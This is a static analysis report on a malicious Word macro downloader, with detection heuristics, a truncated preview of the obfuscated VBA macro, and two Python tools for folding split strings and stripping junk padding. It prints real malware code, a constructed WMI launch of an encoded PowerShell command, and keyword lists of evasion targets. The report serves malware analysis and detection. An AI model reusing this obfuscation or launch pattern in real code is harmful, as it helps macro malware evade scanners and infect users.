Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 530da53c2cdd973f…

MALICIOUS

Office (OLE)

Size: 218.2 KB
Created: 2019-04-29 06:43:00 (taken from the OLE SummaryInformation stream, which the author controls; treat it as a weak timeline anchor)
Authoring application: Microsoft Office Word
First seen: 2019-12-09
MD5: 5f85c3061430619d130f2ad4fc53ee2b
SHA-1: 576e047d97246d646aaaee851b88519b724954f0
SHA-256: 530da53c2cdd973f246c0e294516e8cc6a873c7d24614e0ed36304bcec236ec3
Risk score: 342

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1137.001 Office Application Startup: Office Template Macros

The sample contains VBA macros with an autoopen subroutine, the Word entry point that runs as soon as the document is opened with macros enabled. Critical heuristics indicate the use of GetObject/CreateObject to launch Win32_Process via WMI, with the 'winmgmts' moniker reassembled from split string literals so that no single literal matches a keyword scan. This strongly suggests the macro's intent is to download and execute a second-stage payload, consistent with the ClamAV detection of Doc.Downloader.Powload-6957924-0. Because the child process is created by the WMI provider host, it is parented by WmiPrvSE.exe rather than winword.exe; detections keyed on Office spawning cmd.exe or powershell.exe will miss it, so hunt for WmiPrvSE.exe spawning those binaries instead.

Heuristics (9)

  • ClamAV: Doc.Downloader.Powload-6957924-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6957924-0.
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The module cAZAAAAZ defines Sub autoopen(), which Word runs automatically when the document is opened with macros enabled.
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call; combined with the reassembled winmgmts moniker, this is how the macro obtains the WMI service object.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. For this sample decoded source was also recovered (macros.bas below), so this finding corroborates the source-level findings rather than standing alone.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat: the "no modern VBA project was recovered" qualifier does not hold for this sample, whose VBA project was extracted as macros.bas; treat this marker as a duplicate of the AutoOpen finding, not as independent evidence.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that Office writes into drawing markup; it is not a download or C2 address and carries no indicator value.
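The two critical heuristics above (OLE_VBA_WMI_PROCESS_CREATE and OLE_VBA_SPLIT_KEYWORD_OBFUSCATION) rest on the same normalisation step: folding `"a" & "b"` concatenations and constant string variables back together before keyword matching. The Python below is an added example of that step, written for this report; it is not olevba's code and not the scanner that produced the findings. The macro text it runs on (SAMPLE) is constructed in the style the heuristics describe, because the real downloader stage is truncated out of the preview further down; the keyword list, the function names (`fold_concat`, `deobfuscate`, `scan`) and the result keys are my own.

```python
import re

# Keyword list mirrors the names cited in the report's heuristics; it is an
# illustrative subset chosen for this example, not a scanner's real ruleset.
KEYWORDS = ("winmgmts", "win32_process", "wscript.shell",
            "scripting.filesystemobject", "powershell", "urldownloadtofile")

STR_LIT = r'"(?:[^"]|"")*"'                  # VBA string literal; "" escapes a quote
LIT_RE = re.compile(STR_LIT)
SPLIT_RE = re.compile(f"({STR_LIT})")         # split keeps literals at odd indexes
CONCAT_RE = re.compile(rf"({STR_LIT})\s*[&+]\s*({STR_LIT})")
CONST_RE = re.compile(rf"^\s*(\w+)\s*=\s*({STR_LIT})\s*$")


def fold_concat(line):
    """Merge adjacent literals until stable: "win" & "mgm" & "ts:" -> "winmgmts:"."""
    prev = None
    while prev != line:
        prev = line
        line = CONCAT_RE.sub(
            lambda m: '"' + m.group(1)[1:-1] + m.group(2)[1:-1] + '"', line)
    return line


def propagate(lines, consts):
    """Substitute variables that hold a constant string, outside literals only.
    Dim lines and the defining assignments are left alone; this is a normaliser
    for scanning, not a VBA interpreter."""
    out = []
    for line in lines:
        if re.match(r"^\s*Dim\b", line, re.I) or CONST_RE.match(line):
            out.append(line)
            continue
        segs = SPLIT_RE.split(line)               # even = code, odd = literal
        for i in range(0, len(segs), 2):
            for name, lit in consts.items():
                segs[i] = re.sub(rf"\b{re.escape(name)}\b",
                                 lambda _m, lit=lit: lit, segs[i], flags=re.I)
        out.append("".join(segs))
    return out


def deobfuscate(src, rounds=5):
    """Alternate folding and propagation until nothing changes."""
    lines = src.splitlines()
    consts = {}
    for _ in range(rounds):
        lines = [fold_concat(l) for l in lines]
        for l in lines:
            m = CONST_RE.match(l)
            if m:
                consts[m.group(1).lower()] = m.group(2)
        new = propagate(lines, consts)
        if new == lines:
            break
        lines = new
    return [fold_concat(l) for l in lines]


def scan(src):
    """Keyword hits on the folded source, which of them were split across literals
    in the original, and whether the WMI Win32_Process .Create chain is present."""
    folded = deobfuscate(src)
    original = [lit.lower() for lit in LIT_RE.findall(src)]
    hits, split = set(), set()
    for no, line in enumerate(folded, 1):
        for lit in LIT_RE.findall(line):
            for kw in KEYWORDS:
                if kw in lit.lower():
                    hits.add((kw, no))
                    if not any(kw in o for o in original):
                        split.add(kw)      # visible only after folding: evasion
    text = "\n".join(folded).lower()
    wmi = "winmgmts" in text and "win32_process" in text and ".create" in text
    return {"folded": folded, "hits": sorted(hits),
            "split": sorted(split), "wmi_process_create": wmi}


# Constructed sample in the style the heuristics describe; not the page's macro.
SAMPLE = '''Sub autoopen()
    Dim w, cls
    w = "win" & "mgm" & "ts:"
    cls = "Win32_" + "Proc" & "ess"
    Set o = GetObject(w & cls)
    o.Create "cmd /c " & "power" & "shell -enc AAAA", Null, Null, pid
End Sub
'''

if __name__ == "__main__":
    r = scan(SAMPLE)
    print("\n".join(r["folded"]))
    print("split keywords:", r["split"], "wmi chain:", r["wmi_process_create"])
```

The folder only handles literal-to-literal `&`/`+` joins and single-literal variables; builders based on Chr(), StrReverse, Replace or Split, and strings assembled across procedures, need further passes (olevba's `--deobf` option covers some of these). The useful signal is the `split` set: a keyword that exists only after folding has no legitimate reason to be written that way.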

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 51129 bytes
SHA-256: 70afdc095a53772248f78736d7a8e0f9fa89a5fc38774aac160b0e5868120cc9
Script preview (first 1,000 lines of the extracted source; the report truncates it after the excerpt below)
The four Attribute VB_Name headers are module boundaries: the document module (VB_Base = "1Normal.ThisDocument", template-derived), two modules whose GUID-based VB_Base and VB_PredeclaredId = True are characteristic of UserForm designer modules, and the standard module cAZAAAAZ that holds autoopen. No Option Explicit precedes Sub autoopen(), so every If/ElseIf condition compares two undeclared identifiers that both evaluate to Empty; Empty = Empty is True in VBA, the empty first branch is always taken, and the arithmetic in the ElseIf branches (which would raise a division-by-zero on its Empty divisor) never runs. The only live statement in autoopen is the bare call wDAcAB on its own line; the code it reaches lies past the truncation point. Eo_AkQ is a pass-through wrapper that returns its argument via CVar, of the kind used to break signatures on direct calls.
Attribute VB_Name = "bUZBQX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tAxAxCA"
Attribute VB_Base = "0{FD70A8BA-64EC-4310-8522-28D10BA5D5D5}{80DD4225-9F74-450B-A38F-DA87607FB1DD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "H4Q4kXZ"
Attribute VB_Base = "0{D984F9B4-E6D3-43E0-B098-6BB4DC9349D9}{0E575116-FFB2-46EF-B6FA-1C4B0647BA75}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "cAZAAAAZ"
Sub autoopen()
   If BAcBUDA = PxU_DkA Then
ElseIf aQAAAGAw = Bk1AxQB Then
aABxUB = (134200036 / 258119089 / bxDAkXB - Cos(672853472 + Tan(QQXGUUA)))
ElseIf TAQQA4Z = aDXAcGA Then
wAA_oAAQ = (727342880 / 270044860 / i1kGUG - Cos(994134197 + Tan(dAAAAA)))
ElseIf oQQkx1BA = qB1owA Then
DDA1xADU = (421763117 / 514397740 / kcUoCAA - Cos(170560570 + Tan(ODQ4XD)))
End If
   If JAQQABkC = wDQBXG1 Then
ElseIf AAoZAQ = CwZAAQ Then
NAQXUBA = (86412529 / 552254382 / VGDcAUX - Cos(459026145 + Tan(iDQAUA)))
ElseIf SQB4AA = JBAoQCw Then
ZGwoACAZ = (82540287 / 608052827 / cxAAAX - Cos(156889385 + Tan(MAXkQD1A)))
ElseIf HQAAUZ1x = GDAAZA Then
XoADAAA = (241154974 / 34419033 / fxUQoU_A - Cos(83346995 + Tan(fADUGokC)))
End If
   If oA_AAAA = GAQwAwZC Then
ElseIf cU_AQAX = R1A4QBCX Then
KAAAZkQA = (789720868 / 10779 / OAAGoAG - Cos(692882228 + Tan(m_AGcAcD)))
ElseIf HXQo1Q = McUAXA Then
oDcAZG4w = (917908505 / 806782821 / GAAUAAUD - Cos(468809806 + Tan(EDQ_ABA)))
ElseIf ikxAUQQ = cCZ1AxZ Then
EQACUBAo = (290077703 / 952366938 / iDQBAxU - Cos(742431488 + Tan(Fo_Aco)))
End If
wDAcAB
   If wDDAoU = mAAxk_AG Then
ElseIf sUXkAocB = D_4A4c_C Then
qDxUACG = (643665592 / 909311540 / hABwAoA1 - Cos(226341843 + Tan(EcG1AA)))
ElseIf zcBXA_ = YowAGGo Then
BZ1kAG = (879157124 / 305699705 / CxDQwA - Cos(805258196 + Tan(DcAACDDA)))
ElseIf iUDAxUAk = QGoAX1Z Then
wDBACD1 = (389467402 / 755470840 / PwoDBocA - Cos(349794603 + Tan(GBA4Uk)))
End If
   If jABG4BoA = bxAxQA Then
ElseIf A_wBCGGA = XwAoACDk Then
f4ZQQZA = (319966556 / 380229569 / bAwX1QkU - Cos(908276263 + Tan(XkcAAG)))
ElseIf jGAZXACU = ZDCxAAA Then
BUwUwBA = (144647184 / 370912063 / MZAUAA4G - Cos(41155731 + Tan(rDCAAA_)))
ElseIf kGcGB_ = vo1Bkwwc Then
iQ1DQoU = (556917521 / 146793742 / wcUAZDBZ - Cos(953094481 + Tan(JCQXZAUB)))
End If
   If jA1G1X = UXXxQA Then
ElseIf oBGAA_ = wk_QAABB Then
Y_QcAkw = (238015586 / 111520706 / dQw4QB - Cos(662893844 + Tan(IADDUAAQ)))
ElseIf QAAAAAA = bAADc4D Then
IkXXCA = (235122478 / 306466583 / NcDUA_ - Cos(514070394 + Tan(jABAQwD)))
ElseIf pDADQQD = GUGAxA_ Then
IDco_AU = (736594566 / 312899519 / WCBAoZ1A - Cos(918261606 + Tan(RQxUBcUo)))
End If
End Sub
Function Eo_AkQ(HABQGCU)
   If DAAkAcD = vXCwAA Then
ElseIf V_QwxDc = hwcXAQ Then
iAAZGx = (633399665 / 498443971 / YAAQwAx - Cos(625012323 + Tan(KDBQxX)))
ElseIf tcAAQXUA = m_kAUAZ1 Then
AUXAwB = (810083705 / 599886473 / Y_GAAAc - Cos(45282855 + Tan(H14xok)))
ElseIf jkAAwwo = zwAUQAAZ Then
TDA__ACC = (699137912 / 105650106 / FGAAAAAA - Cos(433268984 + Tan(rxAkADA)))
End If
   If uUAQQQC = wkAcCcxQ Then
ElseIf ukA_4UB = iQCDA4A Then
NcAokAw = (231430453 / 289855476 / i4DZAAD - Cos(847121856 + Tan(TcCBC1)))
ElseIf iDGBU1QA = kAUk1wAc Then
dZAUZAo = (18983017 / 120816890 / CXZUoA - Cos(13680466 + Tan(lDADAGoA)))
ElseIf nCB4ADkA = VAAGQG Then
VUAAAAAX = (251174949 / 887608045 / W4AUBAX4 - Cos(322700329 + Tan(iCkUCABB)))
End If
Set Eo_AkQ = CVar(HABQGCU)
   If QAZDUAAA = CA11DD Then
ElseIf Zk4kAUU = rxoAA_BB Then
FDAQc_A = (803495249 / 66952866 / RAXXBZAX - Cos(80731505
... (truncated)
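The autoopen body above is almost entirely padding. What follows is an added example, mine rather than the report's or the analysis tooling's, that removes such padding mechanically. An If/ElseIf block is dropped only when every condition compares two identifiers that are never assigned anywhere in the module (so both are Empty, Empty = Empty is True, and the empty first branch runs) and every branch body is a pure arithmetic assignment; any call, string or object reference keeps the block. EXCERPT is copied from the autoopen body above, trimmed to two padding blocks around the live call; the function names and the extra inputs in the usage note are constructed.

```python
import re

# Lines copied from the autoopen() body in the preview above, trimmed to two
# padding blocks around the single live statement (wDAcAB).
EXCERPT = '''Sub autoopen()
   If BAcBUDA = PxU_DkA Then
ElseIf aQAAAGAw = Bk1AxQB Then
aABxUB = (134200036 / 258119089 / bxDAkXB - Cos(672853472 + Tan(QQXGUUA)))
ElseIf TAQQA4Z = aDXAcGA Then
wAA_oAAQ = (727342880 / 270044860 / i1kGUG - Cos(994134197 + Tan(dAAAAA)))
End If
wDAcAB
   If oA_AAAA = GAQwAwZC Then
ElseIf cU_AQAX = R1A4QBCX Then
KAAAZkQA = (789720868 / 10779 / OAAGoAG - Cos(692882228 + Tan(m_AGcAcD)))
End If
End Sub
'''

IDENT = r"[A-Za-z_]\w*"
BLOCK_IF_RE = re.compile(r"^\s*If\b.*\bThen\s*$", re.I)      # block If, not single-line
COND_RE = re.compile(rf"^\s*(?:If|ElseIf)\s+({IDENT})\s*=\s*({IDENT})\s+Then\s*$", re.I)
END_IF_RE = re.compile(r"^\s*End If\s*$", re.I)
# Assignment whose right-hand side uses only numbers, names, arithmetic and parens.
MATH_ASSIGN_RE = re.compile(rf"^\s*{IDENT}\s*=\s*[\w\s()+\-*/.]+$")
MATH_FUNCS = {"cos", "sin", "tan", "atn", "abs", "sqr", "log", "exp", "int", "fix"}
ASSIGNED_RE = re.compile(rf"^\s*({IDENT})\s*=", re.M)


def is_inert_block(block, assigned):
    """A block is inert when every If/ElseIf compares two names that are never
    assigned in the module (both Empty, so the comparison is True and the empty
    first branch runs) and every branch body is a side-effect-free arithmetic
    assignment. Anything else (a call, a string, an object) keeps the block."""
    for line in block:
        if END_IF_RE.match(line) or not line.strip():
            continue
        m = COND_RE.match(line)
        if m:
            if m.group(1).lower() in assigned or m.group(2).lower() in assigned:
                return False
            continue
        if not MATH_ASSIGN_RE.match(line):
            return False
        calls = re.findall(rf"({IDENT})\s*\(", line.split("=", 1)[1])
        if any(c.lower() not in MATH_FUNCS for c in calls):
            return False
    return True


def strip_inert_blocks(src):
    """Return the source lines that remain after dropping provably inert padding."""
    assigned = {n.lower() for n in ASSIGNED_RE.findall(src)}
    lines = src.splitlines()
    out, i = [], 0
    while i < len(lines):
        if BLOCK_IF_RE.match(lines[i]):
            depth, j = 0, i
            while j < len(lines):                   # find the matching End If
                if BLOCK_IF_RE.match(lines[j]):
                    depth += 1
                elif END_IF_RE.match(lines[j]):
                    depth -= 1
                    if depth == 0:
                        break
                j += 1
            if depth == 0 and is_inert_block(lines[i:j + 1], assigned):
                i = j + 1                            # skip the whole padding block
                continue
        out.append(lines[i])
        i += 1
    return out


if __name__ == "__main__":
    print("\n".join(strip_inert_blocks(EXCERPT)))
```

Run on EXCERPT this leaves only `Sub autoopen()`, `wDAcAB` and `End Sub`. A block containing `Shell "calc"` or a condition on a name that is assigned elsewhere (`a = 5` followed by `If a = b Then`) is kept intact, which is the conservative failure mode an analyst wants: the stripper should never hide a statement that could execute.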